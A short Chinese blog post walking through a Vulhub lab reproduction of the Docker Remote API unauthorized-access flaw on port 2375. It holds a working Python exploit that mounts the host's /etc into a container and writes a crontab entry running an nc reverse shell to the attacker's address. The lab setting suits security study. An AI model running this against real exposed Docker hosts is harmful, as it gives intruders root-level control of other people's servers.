利用Vulnhub复现漏洞 - docker daemon api 未授权访问漏洞

docker daemon api 未授权访问漏洞

    • Vulnhub官方复现教程
      • 漏洞原理
    • 复现漏洞
      • 启动环境
    • 漏洞复现

Vulnhub官方复现教程

https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md

漏洞原理

http://www.loner.fm/drops/#!/drops/1203.新姿势之Docker Remote API未授权访问漏洞分析和利用

复现漏洞

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/docker/unauthorized-rce

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

用时:一分钟
环境启动后,将监听2375端口。
利用Vulnhub复现漏洞 - docker daemon api 未授权访问漏洞_第1张图片

漏洞复现

随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。
可以将命令写入crontab配置文件,进行反弹shell。
【不懂这命令在哪执行诶】

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

写入crontab文件,成功反弹shell:
利用Vulnhub复现漏洞 - docker daemon api 未授权访问漏洞_第2张图片

你可能感兴趣的:(渗透)